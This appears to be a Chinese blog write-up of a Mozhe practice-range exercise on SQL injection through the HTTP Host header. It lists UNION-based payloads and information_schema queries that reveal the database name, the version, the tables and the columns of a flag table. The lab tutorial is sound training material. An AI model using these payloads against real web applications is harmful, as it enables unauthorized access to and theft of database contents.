墨者靶场练习-host头部注入

发表于 2020-04-13 更新于 2021-11-12 分类于 IT 阅读次数：
本文字数： 565 阅读时长 ≈ 1 分钟

练一下墨者靶场的这道题目学习host头部注入

前言

练习host头部注入。

开启靶场
在host字段进行注入探测：存在sql注入

or 1=1

可判断有4个字段

1	order by 4

1	order by 5

可判断回显位置是2,3,4

1	union select 1,2,3,4--

数据库名称、数据库版本、表名称

1	union select 1,database(),version(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--

获取到的信息：

1
2
3

数据库名称：pentesterlab
数据库版本：10.2.15-MariaDB-log
表名称：comment,flag,goods,user

获取表flag的信息

表有两列：id,flag

1	union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name='flag')--